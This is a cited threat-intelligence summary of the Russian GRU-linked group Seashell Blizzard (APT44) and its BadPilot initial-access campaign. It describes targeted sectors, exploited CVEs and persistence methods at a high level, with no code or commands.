Introduction
The Russian state-sponsored cyber group [8], Seashell Blizzard [1] [2] [3] [4] [5] [6] [7] [8], also known as APT44 [2], has been actively engaging in cyber-espionage and cyber-attacks on behalf of Russian Military Intelligence Unit 74455 (GRU) since at least 2000. This group has notably expanded its operations following the 2022 invasion of Ukraine, targeting critical infrastructure sectors globally [1] [7].
Description
Russian state cyber-actor Seashell Blizzard [3], also known as APT44 [2], has been active since at least 2000 and operates on behalf of Russian Military Intelligence Unit 74455 (GRU) [3], specifically under the Main Center for Special Technologies (GTsST) [4]. The group has engaged a specialist initial access subgroup [3], referred to as the “BadPilot campaign,” which has been conducting operations since at least 2021 to enhance its capability to compromise Internet-facing infrastructure globally, particularly targeting high-value sectors such as energy, oil and gas [3] [5] [7] [8], telecommunications [3] [5] [7] [8], shipping [3] [5] [8], arms manufacturing [3] [5] [7] [8], national governments [2] [3] [5] [7] [8], retail [1], education [1], consulting [1] [2] [5], and agriculture [1].
Following Russia’s invasion of Ukraine in 2022 [8], the campaign’s geographical targeting has expanded beyond Ukraine and Eastern Europe to include the UK, US [1] [3] [8], Canada [3] [7] [8], and Australia [3] [7] [8], reflecting a broader operational scope aligned with Russian military objectives. The subgroup employs opportunistic access techniques and stealthy persistence methods to collect credentials [2] [8], execute commands [1] [2] [7] [8], and facilitate lateral movement [1] [2] [7] [8], resulting in significant regional network compromises [1] [2] [8].
To maintain long-term access, the subgroup has utilized web shells [2], including a custom web shell named LocalOlive [4], and has begun deploying remote management and monitoring (RMM) solutions [2], such as Atera Agent and Splashtop Remote Services [5], as of early 2024 [1]. It has also made malicious modifications to network resources [2], including Outlook Web Access (OWA) sign-in pages and DNS configurations [4], to passively gather network credentials. Additionally, the subgroup has injected rogue JavaScript into legitimate sign-in portals to collect usernames and passwords [2].
The capabilities of the BadPilot campaign have been bolstered by exploiting vulnerabilities in remote access technology systems, particularly in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788) [4] [5] [7]. The subgroup has also targeted vulnerabilities in small office/home office (SOHO) and enterprise networks [4], including Microsoft Exchange (CVE-2021-34473) [4] [5], Zimbra Collaboration (CVE-2022-41352) [4] [5], OpenFire (CVE-2023-32315) [5], and JetBrains TeamCity (CVE-2023-42793) [5]. Its operations indicate a “spray and pray” approach [7], allowing for large-scale compromises with minimal tailored effort [7]. Notably, the subgroup has been linked to at least three destructive cyber attacks in Ukraine since 2023 [7] [8], underscoring its ongoing threat to critical infrastructure organizations globally. As the campaign continues to innovate scalable techniques to compromise networks, it remains aligned with Russia’s war objectives and national priorities. Microsoft threat researchers have identified at least eight vulnerabilities in server infrastructure commonly used in small office and enterprise networks [7], with all but one being critical on the CVSS scale [7], further highlighting the subgroup’s agility in tracking new CVEs for rapid access to targets. The group’s activities also encompass phishing campaigns, malware distribution [1], and supply chain attacks aimed at disrupting services and undermining confidence in the Ukrainian government.
Conclusion
The activities of Seashell Blizzard, particularly through the BadPilot campaign, pose a significant threat to global cybersecurity, especially in critical infrastructure sectors [7]. The group’s ability to exploit vulnerabilities and maintain persistent access underscores the need for robust cybersecurity measures and international cooperation to mitigate these threats. As the geopolitical landscape evolves, the potential for further expansion of their operations remains a concern, necessitating continuous vigilance and adaptation of defensive strategies.
References
[1] https://www.techradar.com/pro/security/major-russian-hacking-group-shifts-focus-to-us-and-uk-targets
[2] https://informationsecuritybuzz.com/russia-linked-seashell-blizzard-intens/
[3] https://www.infosecurity-magazine.com/news/russian-seashell-blizzard-initial/
[4] https://securityaffairs.com/174173/apt/russia-linked-seashell-blizzard-apt-badpilot-op.html
[5] https://cybersecuritynews.com/badpilot-attacking-network-devices/
[6] https://www.cybersecurity-review.com/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/
[7] https://cyberscoop.com/russian-state-threat-group-shifts-focus/
[8] https://www.itpro.com/security/cyber-crime/seashell-blizzard-badpilot-hacking-campaign
